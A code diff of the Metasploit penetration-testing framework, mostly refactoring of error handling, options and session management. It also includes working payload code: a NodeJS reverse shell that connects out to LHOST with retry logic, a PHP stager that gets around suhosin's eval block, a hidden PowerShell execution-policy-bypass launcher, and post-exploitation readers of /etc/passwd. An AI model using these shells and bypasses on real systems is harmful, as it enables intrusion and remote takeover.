@ -81,15 +81,15 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
|
||||||
# @param comments_enabled [Boolean] Check if comments are enabled on this post
|
# @param comments_enabled [Boolean] Check if comments are enabled on this post
|
||||||
# @param login_cookie [String] A valid login cookie to perform the check as an authenticated user
|
# @param login_cookie [String] A valid login cookie to perform the check as an authenticated user
|
||||||
# @return [String,nil] the HTTP response body of the post, nil otherwise
|
# @return [String,nil] the HTTP response body of the post, nil otherwise
|
||||||
def wordpress_helper_check_post_id(uri, comments_enabled=false, login_cookie=nil)
|
def wordpress_helper_check_post_id(uri, comments_enabled = false, login_cookie = nil)
|
||||||
options = {
|
options = {
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'uri' => uri
|
'uri' => uri
|
||||||
}
|
}
|
||||||
options.merge!({'cookie' => login_cookie}) if login_cookie
|
options.merge!({ 'cookie' => login_cookie }) if login_cookie
|
||||||
res = send_request_cgi(options)
|
res = send_request_cgi(options)
|
||||||
# post exists
|
# post exists
|
||||||
if res and res.code == 200
|
if res && res.code == 200
|
||||||
# also check if comments are enabled
|
# also check if comments are enabled
|
||||||
if comments_enabled
|
if comments_enabled
|
||||||
if res.body =~ /form.*action.*wp-comments-post\.php/
|
if res.body =~ /form.*action.*wp-comments-post\.php/
|
||||||
|
@ -123,8 +123,8 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
|
||||||
#
|
#
|
||||||
# @param cookie [String] A valid admin session cookie
|
# @param cookie [String] A valid admin session cookie
|
||||||
# @return [String,nil] The nonce, nil on error
|
# @return [String,nil] The nonce, nil on error
|
||||||
def wordpress_helper_get_plugin_upload_nonce(cookie)
|
def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil)
|
||||||
uri = normalize_uri(wordpress_url_backend, 'plugin-install.php')
|
uri = path || normalize_uri(wordpress_url_backend, 'plugin-install.php')
|
||||||
options = {
|
options = {
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
|
@ -134,6 +134,9 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
|
||||||
res = send_request_cgi(options)
|
res = send_request_cgi(options)
|
||||||
if res && res.code == 200
|
if res && res.code == 200
|
||||||
return res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
|
return res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
|
||||||
|
elsif res && res.redirect? && res.redirection
|
||||||
|
path = wordpress_helper_parse_location_header(res)
|
||||||
|
return wordpress_helper_get_plugin_upload_nonce(cookie, path)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -14,9 +14,11 @@ module Exploit::Powershell
|
||||||
OptBool.new('Powershell::sub_vars', [true, 'Substitute variable names', false]),
|
OptBool.new('Powershell::sub_vars', [true, 'Substitute variable names', false]),
|
||||||
OptBool.new('Powershell::sub_funcs', [true, 'Substitute function names', false]),
|
OptBool.new('Powershell::sub_funcs', [true, 'Substitute function names', false]),
|
||||||
OptBool.new('Powershell::exec_in_place', [true, 'Produce PSH without executable wrapper', false]),
|
OptBool.new('Powershell::exec_in_place', [true, 'Produce PSH without executable wrapper', false]),
|
||||||
|
OptBool.new('Powershell::remove_comspec', [true, 'Produce script calling powershell directly', false]),
|
||||||
|
OptBool.new('Powershell::noninteractive', [true, 'Execute powershell without interaction', true]),
|
||||||
OptBool.new('Powershell::encode_final_payload', [true, 'Encode final payload for -EncodedCommand', false]),
|
OptBool.new('Powershell::encode_final_payload', [true, 'Encode final payload for -EncodedCommand', false]),
|
||||||
OptBool.new('Powershell::encode_inner_payload', [true, 'Encode inner payload for -EncodedCommand', false]),
|
OptBool.new('Powershell::encode_inner_payload', [true, 'Encode inner payload for -EncodedCommand', false]),
|
||||||
OptBool.new('Powershell::use_single_quotes', [true, 'Wraps the -Command argument in single quotes', false]),
|
OptBool.new('Powershell::wrap_double_quotes', [true, 'Wraps the -Command argument in single quotes', true]),
|
||||||
OptBool.new('Powershell::no_equals', [true, 'Pad base64 until no "=" remains', false]),
|
OptBool.new('Powershell::no_equals', [true, 'Pad base64 until no "=" remains', false]),
|
||||||
OptEnum.new('Powershell::method', [true, 'Payload delivery method', 'reflection', %w[net reflection old msil]])
|
OptEnum.new('Powershell::method', [true, 'Payload delivery method', 'reflection', %w[net reflection old msil]])
|
||||||
]
|
]
|
||||||
|
@ -215,14 +217,13 @@ module Exploit::Powershell
|
||||||
# powershell script
|
# powershell script
|
||||||
# @option opts [Boolean] :remove_comspec Removes the %COMSPEC%
|
# @option opts [Boolean] :remove_comspec Removes the %COMSPEC%
|
||||||
# environment variable at the start of the command line
|
# environment variable at the start of the command line
|
||||||
# @option opts [Boolean] :use_single_quotes Wraps the -Command
|
# @option opts [Boolean] :wrap_double_quotes Wraps the -Command
|
||||||
# argument in single quotes unless :encode_final_payload
|
# argument in double quotes unless :encode_final_payload
|
||||||
#
|
#
|
||||||
# @return [String] Powershell command line with payload
|
# @return [String] Powershell command line with payload
|
||||||
def cmd_psh_payload(pay, payload_arch, opts = {})
|
def cmd_psh_payload(pay, payload_arch, opts = {})
|
||||||
options.validate(datastore)
|
%i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload
|
||||||
|
remove_comspec noninteractive wrap_double_quotes no_equals method].map do |opt|
|
||||||
%i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload use_single_quotes no_equals method].map do |opt|
|
|
||||||
opts[opt] ||= datastore["Powershell::#{opt}"]
|
opts[opt] ||= datastore["Powershell::#{opt}"]
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -111,7 +111,7 @@ module Exploit::Remote::SMTPDeliver
|
||||||
unless res[0..2] == '235'
|
unless res[0..2] == '235'
|
||||||
print_error("Authentication failed, quitting")
|
print_error("Authentication failed, quitting")
|
||||||
disconnect(nsock)
|
disconnect(nsock)
|
||||||
raise RuntimeError.new 'Could not authenticate to SMTP server'
|
raise 'Could not authenticate to SMTP server'
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
print_status("Server requested auth and no creds given, trying to continue anyway")
|
print_status("Server requested auth and no creds given, trying to continue anyway")
|
||||||
|
@ -126,7 +126,7 @@ module Exploit::Remote::SMTPDeliver
|
||||||
unless res[0..2] == '235'
|
unless res[0..2] == '235'
|
||||||
print_error("Authentication failed, quitting")
|
print_error("Authentication failed, quitting")
|
||||||
disconnect(nsock)
|
disconnect(nsock)
|
||||||
raise RuntimeError.new 'Could not authenticate to SMTP server'
|
raise 'Could not authenticate to SMTP server'
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
print_status("Server requested auth and no creds given, trying to continue anyway")
|
print_status("Server requested auth and no creds given, trying to continue anyway")
|
||||||
|
|
|
@ -247,6 +247,10 @@ protected
|
||||||
if session.respond_to?(:bootstrap)
|
if session.respond_to?(:bootstrap)
|
||||||
session.bootstrap(datastore, self)
|
session.bootstrap(datastore, self)
|
||||||
else
|
else
|
||||||
|
# Process the auto-run scripts for this session
|
||||||
|
if session.respond_to?(:process_autoruns)
|
||||||
|
session.process_autoruns(datastore)
|
||||||
|
end
|
||||||
on_session(session)
|
on_session(session)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -143,8 +143,7 @@ class Msf::Module::Platform
|
||||||
|
|
||||||
if (not mod.const_defined?('Names'))
|
if (not mod.const_defined?('Names'))
|
||||||
elog("Failed to instantiate the platform list for module #{mod}")
|
elog("Failed to instantiate the platform list for module #{mod}")
|
||||||
raise RuntimeError.new("Failed to instantiate the platform list for module #{mod}")
|
raise "Failed to instantiate the platform list for module #{mod}"
|
||||||
return nil
|
|
||||||
end
|
end
|
||||||
|
|
||||||
abbrev = mod.const_get('Abbrev')
|
abbrev = mod.const_get('Abbrev')
|
||||||
|
|
|
@ -41,7 +41,10 @@ class Msf::Payload::Apk
|
||||||
application = amanifest.xpath('//application')
|
application = amanifest.xpath('//application')
|
||||||
application_name = application.attribute("name")
|
application_name = application.attribute("name")
|
||||||
if application_name
|
if application_name
|
||||||
return application_name.to_s
|
application_str = application_name.to_s
|
||||||
|
unless application_str == 'android.app.Application'
|
||||||
|
return application_str
|
||||||
|
end
|
||||||
end
|
end
|
||||||
activities = amanifest.xpath("//activity|//activity-alias")
|
activities = amanifest.xpath("//activity|//activity-alias")
|
||||||
for activity in activities
|
for activity in activities
|
||||||
|
@ -221,7 +224,7 @@ class Msf::Payload::Apk
|
||||||
FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
|
FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
|
||||||
|
|
||||||
package = amanifest.xpath("//manifest").first['package']
|
package = amanifest.xpath("//manifest").first['package']
|
||||||
package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}"
|
package = package.downcase + ".#{Rex::Text::rand_text_alpha_lower(5)}"
|
||||||
classes = {}
|
classes = {}
|
||||||
classes['Payload'] = Rex::Text::rand_text_alpha_lower(5).capitalize
|
classes['Payload'] = Rex::Text::rand_text_alpha_lower(5).capitalize
|
||||||
classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize
|
classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize
|
||||||
|
|
|
@ -31,7 +31,7 @@ module Payload::Linux::BindTcp
|
||||||
|
|
||||||
# Generate the more advanced stager if we have the space
|
# Generate the more advanced stager if we have the space
|
||||||
if self.available_space && required_space <= self.available_space
|
if self.available_space && required_space <= self.available_space
|
||||||
conf[:exitfunk] = datastore['EXITFUNC'],
|
conf[:exitfunk] = datastore['EXITFUNC']
|
||||||
conf[:reliable] = true
|
conf[:reliable] = true
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -19,11 +19,11 @@ module Msf::Payload::NodeJS
|
||||||
var sh = cp.spawn(cmd, []);
|
var sh = cp.spawn(cmd, []);
|
||||||
socket.pipe(sh.stdin);
|
socket.pipe(sh.stdin);
|
||||||
if (typeof util.pump === "undefined") {
|
if (typeof util.pump === "undefined") {
|
||||||
sh.stdout.pipe(client.socket);
|
sh.stdout.pipe(socket);
|
||||||
sh.stderr.pipe(client.socket);
|
sh.stderr.pipe(socket);
|
||||||
} else {
|
} else {
|
||||||
util.pump(sh.stdout, client.socket);
|
util.pump(sh.stdout, socket);
|
||||||
util.pump(sh.stderr, client.socket);
|
util.pump(sh.stderr, socket);
|
||||||
}
|
}
|
||||||
});
|
});
|
||||||
server.listen(#{datastore['LPORT']});
|
server.listen(#{datastore['LPORT']});
|
||||||
|
@ -56,16 +56,27 @@ module Msf::Payload::NodeJS
|
||||||
util = require("util"),
|
util = require("util"),
|
||||||
sh = cp.spawn(cmd, []);
|
sh = cp.spawn(cmd, []);
|
||||||
var client = this;
|
var client = this;
|
||||||
client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
|
var counter=0;
|
||||||
|
function StagerRepeat(){
|
||||||
|
client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
|
||||||
client.socket.pipe(sh.stdin);
|
client.socket.pipe(sh.stdin);
|
||||||
if (typeof util.pump === "undefined") {
|
if (typeof util.pump === "undefined") {
|
||||||
sh.stdout.pipe(client.socket);
|
sh.stdout.pipe(client.socket);
|
||||||
sh.stderr.pipe(client.socket);
|
sh.stderr.pipe(client.socket);
|
||||||
} else {
|
} else {
|
||||||
util.pump(sh.stdout, client.socket);
|
util.pump(sh.stdout, client.socket);
|
||||||
util.pump(sh.stderr, client.socket);
|
util.pump(sh.stderr, client.socket);
|
||||||
}
|
}
|
||||||
});
|
});
|
||||||
|
socket.on("error", function(error) {
|
||||||
|
counter++;
|
||||||
|
if(counter<= #{datastore['StagerRetryCount']}){
|
||||||
|
setTimeout(function() { StagerRepeat();}, #{datastore['StagerRetryWait']}*1000);
|
||||||
|
} else
|
||||||
|
process.exit();
|
||||||
|
});
|
||||||
|
}
|
||||||
|
StagerRepeat();
|
||||||
})();
|
})();
|
||||||
EOS
|
EOS
|
||||||
cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
|
cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
|
||||||
|
|
|
@ -109,7 +109,15 @@ while (strlen($b) < $len) {
|
||||||
# Set up the socket for the main stage to use.
|
# Set up the socket for the main stage to use.
|
||||||
$GLOBALS['msgsock'] = $s;
|
$GLOBALS['msgsock'] = $s;
|
||||||
$GLOBALS['msgsock_type'] = $s_type;
|
$GLOBALS['msgsock_type'] = $s_type;
|
||||||
eval($b);
|
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
|
||||||
|
{
|
||||||
|
$suhosin_bypass=create_function('', $b);
|
||||||
|
$suhosin_bypass();
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
eval($b);
|
||||||
|
}
|
||||||
die();^
|
die();^
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -102,7 +102,15 @@ while (strlen($b) < $len) {
|
||||||
# Set up the socket for the main stage to use.
|
# Set up the socket for the main stage to use.
|
||||||
$GLOBALS['msgsock'] = $s;
|
$GLOBALS['msgsock'] = $s;
|
||||||
$GLOBALS['msgsock_type'] = $s_type;
|
$GLOBALS['msgsock_type'] = $s_type;
|
||||||
eval($b);
|
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
|
||||||
|
{
|
||||||
|
$suhosin_bypass=create_function('', $b);
|
||||||
|
$suhosin_bypass();
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
eval($b);
|
||||||
|
}
|
||||||
die();^
|
die();^
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -43,7 +43,8 @@ class Msf::Payload::UUID
|
||||||
24 => ARCH_AARCH64,
|
24 => ARCH_AARCH64,
|
||||||
25 => ARCH_MIPS64,
|
25 => ARCH_MIPS64,
|
||||||
26 => ARCH_PPC64LE,
|
26 => ARCH_PPC64LE,
|
||||||
27 => ARCH_R
|
27 => ARCH_R,
|
||||||
|
28 => ARCH_PPCE500V2
|
||||||
}
|
}
|
||||||
|
|
||||||
Platforms = {
|
Platforms = {
|
||||||
|
|
|
@ -35,7 +35,7 @@ module Payload::Windows::BindTcp
|
||||||
|
|
||||||
# Generate the more advanced stager if we have the space
|
# Generate the more advanced stager if we have the space
|
||||||
if self.available_space && required_space <= self.available_space
|
if self.available_space && required_space <= self.available_space
|
||||||
conf[:exitfunk] = datastore['EXITFUNC'],
|
conf[:exitfunk] = datastore['EXITFUNC']
|
||||||
conf[:reliable] = true
|
conf[:reliable] = true
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -33,7 +33,7 @@ module Payload::Windows::BindTcpRc4
|
||||||
|
|
||||||
# Generate the more advanced stager if we have the space
|
# Generate the more advanced stager if we have the space
|
||||||
if self.available_space && required_space <= self.available_space
|
if self.available_space && required_space <= self.available_space
|
||||||
conf[:exitfunk] = datastore['EXITFUNC'],
|
conf[:exitfunk] = datastore['EXITFUNC']
|
||||||
conf[:reliable] = true
|
conf[:reliable] = true
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -44,7 +44,18 @@ module Payload::Windows::Powershell
|
||||||
script_in.gsub!('LHOST_REPLACE', lhost.to_s)
|
script_in.gsub!('LHOST_REPLACE', lhost.to_s)
|
||||||
|
|
||||||
script = Rex::Powershell::Command.compress_script(script_in)
|
script = Rex::Powershell::Command.compress_script(script_in)
|
||||||
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
|
command_args = {
|
||||||
|
noprofile: true,
|
||||||
|
windowstyle: 'hidden',
|
||||||
|
noninteractive: true,
|
||||||
|
executionpolicy: 'bypass'
|
||||||
|
}
|
||||||
|
cli = Rex::Powershell::Command.generate_psh_command_line(command_args)
|
||||||
|
return "#{cli} \"#{script}\""
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate
|
||||||
|
command_string
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -33,7 +33,7 @@ module Payload::Windows::BindTcp_x64
|
||||||
|
|
||||||
# Generate the more advanced stager if we have the space
|
# Generate the more advanced stager if we have the space
|
||||||
if self.available_space && required_space <= self.available_space
|
if self.available_space && required_space <= self.available_space
|
||||||
conf[:exitfunk] = datastore['EXITFUNC'],
|
conf[:exitfunk] = datastore['EXITFUNC']
|
||||||
conf[:reliable] = true
|
conf[:reliable] = true
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -29,9 +29,13 @@ class Msf::Post < Msf::Module
|
||||||
|
|
||||||
def setup
|
def setup
|
||||||
m = replicant
|
m = replicant
|
||||||
|
|
||||||
if m.actions.length > 0 && !m.action
|
if m.actions.length > 0 && !m.action
|
||||||
raise Msf::MissingActionError, "Please use: #{m.actions.collect {|e| e.name} * ", "}"
|
raise Msf::MissingActionError, "Please use: #{m.actions.collect {|e| e.name} * ", "}"
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Msf::Module(Msf::PostMixin)#setup
|
||||||
|
super
|
||||||
end
|
end
|
||||||
|
|
||||||
def type
|
def type
|
||||||
|
|
|
@ -86,12 +86,18 @@ module System
|
||||||
version = read_file("/etc/gentoo-release").gsub(/\n|\\n|\\l/,'')
|
version = read_file("/etc/gentoo-release").gsub(/\n|\\n|\\l/,'')
|
||||||
system_data[:distro] = "gentoo"
|
system_data[:distro] = "gentoo"
|
||||||
system_data[:version] = version
|
system_data[:version] = version
|
||||||
else
|
|
||||||
|
|
||||||
# Others
|
# Generic
|
||||||
|
elsif etc_files.include?("issue")
|
||||||
version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
|
version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
|
||||||
system_data[:distro] = "linux"
|
system_data[:distro] = "linux"
|
||||||
system_data[:version] = version
|
system_data[:version] = version
|
||||||
|
|
||||||
|
# Others, could be a mismatch like ssh_login to cisco device
|
||||||
|
else
|
||||||
|
system_data[:distro] = "linux"
|
||||||
|
system_data[:version] = ''
|
||||||
|
|
||||||
end
|
end
|
||||||
return system_data
|
return system_data
|
||||||
end
|
end
|
||||||
|
|
|
@ -40,14 +40,17 @@ module Msf::Post::Unix
|
||||||
#
|
#
|
||||||
def get_groups
|
def get_groups
|
||||||
groups = []
|
groups = []
|
||||||
cmd_out = read_file("/etc/group").split("\n")
|
group = '/etc/group'
|
||||||
cmd_out.each do |l|
|
if file_exist?(group)
|
||||||
entry = {}
|
cmd_out = read_file(group).split("\n")
|
||||||
user_field = l.split(":")
|
cmd_out.each do |l|
|
||||||
entry[:name] = user_field[0]
|
entry = {}
|
||||||
entry[:gid] = user_field[2]
|
user_field = l.split(":")
|
||||||
entry[:users] = user_field[3]
|
entry[:name] = user_field[0]
|
||||||
groups << entry
|
entry[:gid] = user_field[2]
|
||||||
|
entry[:users] = user_field[3]
|
||||||
|
groups << entry
|
||||||
|
end
|
||||||
end
|
end
|
||||||
return groups
|
return groups
|
||||||
end
|
end
|
||||||
|
@ -59,8 +62,11 @@ module Msf::Post::Unix
|
||||||
user_dirs = []
|
user_dirs = []
|
||||||
|
|
||||||
# get all user directories from /etc/passwd
|
# get all user directories from /etc/passwd
|
||||||
read_file("/etc/passwd").each_line do |passwd_line|
|
passwd = '/etc/passwd'
|
||||||
user_dirs << passwd_line.split(/:/)[5]
|
if file_exist?(passwd)
|
||||||
|
read_file(passwd).each_line do |passwd_line|
|
||||||
|
user_dirs << passwd_line.split(/:/)[5]
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
# also list other common places for home directories in the event that
|
# also list other common places for home directories in the event that
|
||||||
|
|
|
@ -119,7 +119,7 @@ module LDAP
|
||||||
domain ||= get_domain
|
domain ||= get_domain
|
||||||
|
|
||||||
if domain.blank?
|
if domain.blank?
|
||||||
raise RuntimeError, "Unable to find the domain to query."
|
raise "Unable to find the domain to query."
|
||||||
end
|
end
|
||||||
|
|
||||||
if load_extapi
|
if load_extapi
|
||||||
|
@ -338,7 +338,7 @@ module LDAP
|
||||||
init_result = wldap32.ldap_sslinitA(domain, 389, 0)
|
init_result = wldap32.ldap_sslinitA(domain, 389, 0)
|
||||||
session_handle = init_result['return']
|
session_handle = init_result['return']
|
||||||
if session_handle == 0
|
if session_handle == 0
|
||||||
raise RuntimeError.new("Unable to initialize ldap server: #{init_result["ErrorMessage"]}")
|
raise "Unable to initialize ldap server: #{init_result["ErrorMessage"]}"
|
||||||
end
|
end
|
||||||
|
|
||||||
vprint_status("LDAP Handle: #{session_handle}")
|
vprint_status("LDAP Handle: #{session_handle}")
|
||||||
|
@ -352,7 +352,7 @@ module LDAP
|
||||||
bind = bind_result['return']
|
bind = bind_result['return']
|
||||||
unless bind == 0
|
unless bind == 0
|
||||||
wldap32.ldap_unbind(session_handle)
|
wldap32.ldap_unbind(session_handle)
|
||||||
raise RuntimeError.new("Unable to bind to ldap server: #{ERROR_CODE_TO_CONSTANT[bind]}")
|
raise "Unable to bind to ldap server: #{ERROR_CODE_TO_CONSTANT[bind]}"
|
||||||
end
|
end
|
||||||
|
|
||||||
if (block_given?)
|
if (block_given?)
|
||||||
|
|
|
@ -194,7 +194,7 @@ module Msf::Post::Windows::Priv
|
||||||
#
|
#
|
||||||
def is_high_integrity?
|
def is_high_integrity?
|
||||||
il = get_integrity_level
|
il = get_integrity_level
|
||||||
(il == INTEGRITY_LEVEL_SID[:high] || il == INTEGRITY_LEVEL_SIDE[:system])
|
(il == INTEGRITY_LEVEL_SID[:high] || il == INTEGRITY_LEVEL_SID[:system])
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
|
|
|
@ -78,7 +78,7 @@ module Services
|
||||||
# );
|
# );
|
||||||
manag = advapi32.OpenSCManagerA(machine_str,nil,access)
|
manag = advapi32.OpenSCManagerA(machine_str,nil,access)
|
||||||
if (manag["return"] == 0)
|
if (manag["return"] == 0)
|
||||||
raise RuntimeError.new("Unable to open service manager: #{manag["ErrorMessage"]}")
|
raise "Unable to open service manager: #{manag["ErrorMessage"]}"
|
||||||
end
|
end
|
||||||
|
|
||||||
if (block_given?)
|
if (block_given?)
|
||||||
|
@ -115,7 +115,7 @@ module Services
|
||||||
def open_service_handle(manager, name, access)
|
def open_service_handle(manager, name, access)
|
||||||
handle = advapi32.OpenServiceA(manager, name, access)
|
handle = advapi32.OpenServiceA(manager, name, access)
|
||||||
if (handle["return"] == 0)
|
if (handle["return"] == 0)
|
||||||
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["ErrorMessage"]}")
|
raise "Could not open service. OpenServiceA error: #{handle["ErrorMessage"]}"
|
||||||
end
|
end
|
||||||
|
|
||||||
if (block_given?)
|
if (block_given?)
|
||||||
|
@ -267,7 +267,7 @@ module Services
|
||||||
when "manual" then startup_number = START_TYPE_MANUAL
|
when "manual" then startup_number = START_TYPE_MANUAL
|
||||||
when "disable" then startup_number = START_TYPE_DISABLED
|
when "disable" then startup_number = START_TYPE_DISABLED
|
||||||
else
|
else
|
||||||
raise RuntimeError, "Invalid Startup Mode: #{mode}"
|
raise "Invalid Startup Mode: #{mode}"
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -453,7 +453,7 @@ module Services
|
||||||
status = advapi32.QueryServiceStatus(service_handle,28)
|
status = advapi32.QueryServiceStatus(service_handle,28)
|
||||||
|
|
||||||
if (status["return"] == 0)
|
if (status["return"] == 0)
|
||||||
raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{status["ErrorMessage"]}")
|
raise "Could not query service. QueryServiceStatus error: #{status["ErrorMessage"]}"
|
||||||
else
|
else
|
||||||
ret = parse_service_status_struct(status['lpServiceStatus'])
|
ret = parse_service_status_struct(status['lpServiceStatus'])
|
||||||
end
|
end
|
||||||
|
@ -485,7 +485,7 @@ module Services
|
||||||
vprint_good("[#{name}] Service started")
|
vprint_good("[#{name}] Service started")
|
||||||
return true
|
return true
|
||||||
else
|
else
|
||||||
raise RuntimeError, status
|
raise status
|
||||||
end
|
end
|
||||||
rescue RuntimeError => s
|
rescue RuntimeError => s
|
||||||
if tried
|
if tried
|
||||||
|
|
|
@ -20,7 +20,8 @@ module Msf::PostMixin
|
||||||
] , Msf::Post)
|
] , Msf::Post)
|
||||||
|
|
||||||
# Default stance is active
|
# Default stance is active
|
||||||
self.passive = (info['Passive'] and info['Passive'] == true) || false
|
self.passive = info['Passive'] || false
|
||||||
|
self.session_types = info['SessionTypes'] || []
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
|
@ -38,7 +39,8 @@ module Msf::PostMixin
|
||||||
print_warning('SESSION may not be compatible with this module.')
|
print_warning('SESSION may not be compatible with this module.')
|
||||||
end
|
end
|
||||||
|
|
||||||
super
|
# Msf::Exploit#setup for exploits, NoMethodError for post modules
|
||||||
|
super rescue NoMethodError
|
||||||
|
|
||||||
check_for_session_readiness() if session.type == "meterpreter"
|
check_for_session_readiness() if session.type == "meterpreter"
|
||||||
|
|
||||||
|
@ -161,8 +163,8 @@ module Msf::PostMixin
|
||||||
return false if s.nil?
|
return false if s.nil?
|
||||||
|
|
||||||
# Can't be compatible if it's the wrong type
|
# Can't be compatible if it's the wrong type
|
||||||
if self.module_info["SessionTypes"]
|
if session_types
|
||||||
return false unless self.module_info["SessionTypes"].include?(s.type)
|
return false unless session_types.include?(s.type)
|
||||||
end
|
end
|
||||||
|
|
||||||
# Types are okay, now check the platform.
|
# Types are okay, now check the platform.
|
||||||
|
@ -189,9 +191,16 @@ module Msf::PostMixin
|
||||||
# @see passive?
|
# @see passive?
|
||||||
attr_reader :passive
|
attr_reader :passive
|
||||||
|
|
||||||
|
#
|
||||||
|
# A list of compatible session types
|
||||||
|
#
|
||||||
|
# @return [Array]
|
||||||
|
attr_reader :session_types
|
||||||
|
|
||||||
protected
|
protected
|
||||||
|
|
||||||
attr_writer :passive
|
attr_writer :passive
|
||||||
|
attr_writer :session_types
|
||||||
|
|
||||||
def session_changed?
|
def session_changed?
|
||||||
@ds_session ||= datastore["SESSION"]
|
@ds_session ||= datastore["SESSION"]
|
||||||
|
|
|
@ -41,18 +41,19 @@ class Core
|
||||||
"-c" => [ true, "Run a command on the session given with -i, or all" ],
|
"-c" => [ true, "Run a command on the session given with -i, or all" ],
|
||||||
"-C" => [ true, "Run a Meterpreter Command on the session given with -i, or all" ],
|
"-C" => [ true, "Run a Meterpreter Command on the session given with -i, or all" ],
|
||||||
"-h" => [ false, "Help banner" ],
|
"-h" => [ false, "Help banner" ],
|
||||||
"-i" => [ true, "Interact with the supplied session ID " ],
|
"-i" => [ true, "Interact with the supplied session ID" ],
|
||||||
"-l" => [ false, "List all active sessions" ],
|
"-l" => [ false, "List all active sessions" ],
|
||||||
"-v" => [ false, "List sessions in verbose mode" ],
|
"-v" => [ false, "List sessions in verbose mode" ],
|
||||||
"-q" => [ false, "Quiet mode" ],
|
"-q" => [ false, "Quiet mode" ],
|
||||||
"-k" => [ true, "Terminate sessions by session ID and/or range" ],
|
"-k" => [ true, "Terminate sessions by session ID and/or range" ],
|
||||||
"-K" => [ false, "Terminate all sessions" ],
|
"-K" => [ false, "Terminate all sessions" ],
|
||||||
"-s" => [ true, "Run a script on the session given with -i, or all" ],
|
"-s" => [ true, "Run a script or module on the session given with -i, or all" ],
|
||||||
"-r" => [ false, "Reset the ring buffer for the session given with -i, or all" ],
|
"-r" => [ false, "Reset the ring buffer for the session given with -i, or all" ],
|
||||||
"-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ],
|
"-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ],
|
||||||
"-t" => [ true, "Set a response timeout (default: 15)" ],
|
"-t" => [ true, "Set a response timeout (default: 15)" ],
|
||||||
"-S" => [ true, "Row search filter." ],
|
"-S" => [ true, "Row search filter." ],
|
||||||
"-x" => [ false, "Show extended information in the session table" ])
|
"-x" => [ false, "Show extended information in the session table" ],
|
||||||
|
"-n" => [ true, "Name or rename a session by ID" ])
|
||||||
|
|
||||||
@@threads_opts = Rex::Parser::Arguments.new(
|
@@threads_opts = Rex::Parser::Arguments.new(
|
||||||
"-h" => [ false, "Help banner." ],
|
"-h" => [ false, "Help banner." ],
|
||||||
|
@ -138,10 +139,9 @@ class Core
|
||||||
def initialize(driver)
|
def initialize(driver)
|
||||||
super
|
super
|
||||||
|
|
||||||
@dscache = {}
|
|
||||||
@cache_payloads = nil
|
@cache_payloads = nil
|
||||||
@previous_module = nil
|
@previous_module = nil
|
||||||
@module_name_stack = []
|
@previous_target = nil
|
||||||
@history_limit = 100
|
@history_limit = 100
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -1142,6 +1142,7 @@ class Core
|
||||||
reset_ring = false
|
reset_ring = false
|
||||||
response_timeout = 15
|
response_timeout = 15
|
||||||
search_term = nil
|
search_term = nil
|
||||||
|
session_name = nil
|
||||||
|
|
||||||
# any arguments that don't correspond to an option or option arg will
|
# any arguments that don't correspond to an option or option arg will
|
||||||
# be put in here
|
# be put in here
|
||||||
|
@ -1179,10 +1180,10 @@ class Core
|
||||||
sid = val || false
|
sid = val || false
|
||||||
when "-K"
|
when "-K"
|
||||||
method = 'killall'
|
method = 'killall'
|
||||||
# Run a script on all meterpreter sessions
|
# Run a script or module on specified sessions
|
||||||
when "-s"
|
when "-s"
|
||||||
unless script
|
unless script
|
||||||
method = 'scriptall'
|
method = 'script'
|
||||||
script = val
|
script = val
|
||||||
end
|
end
|
||||||
# Upload and exec to the specific command session
|
